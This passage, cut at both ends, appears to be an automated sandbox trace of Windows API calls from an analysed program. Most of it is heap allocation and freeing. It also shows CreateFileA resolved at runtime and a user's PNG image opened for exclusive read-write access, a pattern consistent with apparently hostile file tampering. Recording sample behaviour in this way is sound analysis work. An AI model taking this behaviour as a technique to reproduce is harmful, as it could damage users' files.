hHeap=0x8a0000) returned 1 [0189.777] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0189.777] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0189.777] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0189.777] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0189.777] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0189.777] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0189.777] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0189.777] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0189.777] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0189.777] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0189.777] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0189.777] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0189.777] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0189.777] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0189.777] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0189.777] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0189.777] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0189.777] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0189.777] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0189.777] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0189.777] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0189.778] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0189.778] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0189.778] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0189.778] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0189.778] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0189.778] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0189.778] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0189.778] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0c88 [0189.778] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0189.778] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0189.778] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0189.778] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0189.778] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0189.778] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0189.778] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0189.778] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0189.778] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0189.778] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0189.778] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0189.778] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0189.778] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0189.778] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0189.779] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0189.779] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0189.779] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0189.779] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0189.779] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0189.779] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0189.779] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0189.779] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0189.779] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0189.779] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0189.779] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0189.779] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0189.779] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0189.779] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0189.779] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0189.779] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0189.779] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0189.779] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0189.779] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0189.779] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0189.779] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0189.779] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0189.779] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0189.780] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0189.780] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0189.780] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0189.780] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0189.780] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0189.780] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0189.780] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0189.780] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0189.780] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0189.780] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0189.780] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0189.780] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0189.780] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0189.780] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0189.780] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0189.780] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0189.780] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0189.780] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0189.780] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0189.780] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0189.780] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0189.781] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0189.781] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0189.781] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0189.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0189.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0189.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0189.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0189.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0189.781] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0189.781] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0189.781] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0189.781] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0189.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0189.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0189.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0189.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0189.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0189.781] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0189.781] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0189.781] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0189.781] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0189.781] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0189.782] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0189.782] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0189.782] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0189.782] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb) returned 0x9bd648 [0189.782] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x9bd648, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0189.782] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0189.782] GetProcAddress (hModule=0x75990000, lpProcName="CreateFile") returned 0x0 [0189.782] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0189.782] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0189.782] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0189.782] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0189.782] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0189.782] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0189.782] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0189.783] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd648 [0189.783] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x9bd648, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0189.783] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0189.783] GetProcAddress (hModule=0x75990000, lpProcName="CreateFileA") returned 0x759a53c6 [0189.783] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0189.783] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0189.783] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0189.783] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0189.783] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0189.783] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0189.783] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0189.784] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0189.784] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0189.784] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0189.784] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0189.784] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1990 [0189.784] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10001) returned 0xbca008 [0189.784] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\qiez.png", cchWideChar=78, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 78 [0189.784] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4e) returned 0x923a78 [0189.784] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\qiez.png", cchWideChar=78, lpMultiByteStr=0x923a78, cbMultiByte=78, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\qiez.png", lpUsedDefaultChar=0x0) returned 78 [0189.784] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923a78 | out: hHeap=0x8a0000) returned 1 [0189.784] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0189.784] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0189.784] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0189.784] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0189.784] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0189.784] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0189.784] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0189.784] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0189.784] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\qiez.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gx6xg0mp-oop8lyh\\e hluvffklat\\qiez.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0189.785] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1990 [0189.785] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0189.785] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0189.785] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0189.785] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0189.785] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0189.785] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0189.785] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0189.785] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0189.785] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0189.786] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0189.786] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0189.786] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0189.786] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0189.786] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=78, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 78 [0189.786] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x9c) returned 0x8f9058 [0189.786] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=78, lpWideCharStr=0x8f9058, cchWideChar=78 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\qiez.png") returned 78 [0189.786] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0189.786] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa0) returned 0x8f9100 [0189.786] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8f9058 | out: hHeap=0x8a0000) returned 1 [0189.786] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0189.786] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0189.786] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0189.786] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0189.786] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0189.786] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0189.786] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0189.786] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0189.786] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0189.786] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0189.786] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0189.786] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0189.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0189.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0189.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0189.787] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0189.787] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0189.787] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0189.787] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0189.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0189.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0189.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0189.787] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0189.787] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0189.787] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0189.787] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0189.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0189.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0189.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0189.787] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0189.787] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0189.787] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0189.787] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0189.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0189.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0189.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0189.788] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0189.788] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0189.788] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0189.788] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0189.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0189.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0189.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0189.788] FreeLibrary (hLibModule=0x75990000) returned 1 [0189.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0189.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0189.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0189.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0189.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0189.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0189.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0189.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0189.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, 